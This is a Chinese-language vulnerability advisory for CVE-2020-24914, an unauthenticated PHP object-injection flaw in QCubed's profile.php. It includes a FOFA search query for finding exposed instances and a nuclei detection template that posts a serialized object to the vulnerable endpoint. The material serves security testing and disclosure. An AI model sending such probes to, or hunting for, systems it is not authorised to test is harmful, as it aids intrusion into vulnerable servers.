QCubed PHP Object Injection Vulnerability

漏洞信息

漏洞名称: QCubed PHP Object Injection Vulnerability

漏洞编号:

  • CVE: CVE-2020-24914

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: QCubed是一个PHP框架,用于快速开发Web应用程序。它广泛应用于各种Web开发项目中,提供了一个丰富的组件库和工具,以支持开发者的高效开发。该框架的典型部署场景包括企业级服务和常见的Web应用组件。由于其广泛的使用,该框架的安全性对许多项目至关重要。

该漏洞属于反序列化类型,技术根源在于QCubed框架的profile.php文件中存在对不可信的POST数据进行反序列化的操作。攻击者可以通过构造恶意的POST请求,利用这一漏洞实现PHP对象注入,进而执行任意代码。这种漏洞的利用不需要认证,攻击者可以远程利用此漏洞,对系统造成严重影响。

该漏洞的影响极为严重,因为它允许未认证的攻击者远程执行任意代码,可能导致服务器被完全控制,数据泄露,服务中断等严重后果。由于漏洞的利用条件简单,且不需要用户交互,因此可以被自动化工具广泛利用,对使用QCubed框架的Web应用构成了极大的安全威胁。

产品厂商: QCubed

产品名称: QCubed

影响版本: 3.1.1 and all versions

搜索语法: title=”QCubed” || body=”qcubed”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/824698f0d3eee3620f587a0b400253d11106ffc6/http%2Fvulnerabilities%2Fphp%2Fqcubed-php-object-injection.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

id: qcubed-php-object-injection

info:
  name: QCubed PHP Object Injection (CVE-2020-24914)
  author: pranjal
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection caused by unserializing untrusted POST data in profile.php,
    letting unauthenticated attackers execute arbitrary code via crafted POST requests.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24914
    - http://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-01
  classification:
    cwe-id: CWE-502
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 2
    product: QCubed
    fofa-query: title="QCubed" || body="qcubed"
  tags: cve,cve2020,qcubed,php,object-injection,rce,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "qcubed") || contains(tolower(body), "qform")'
        condition: and
        internal: true

  - raw:
      - |
        POST /profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        data=O:8:"stdClass":1:{s:4:"test";s:10:"{{randstr}}";}&action=save&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "stdClass"
          - "{{randstr}}"

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - 'contains(body, "stdClass")'
          - 'contains(body, "{{randstr}}")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'O:8:"stdClass":1:\{s:4:"test";s:\d+:"[^"]+";\}'
        internal: true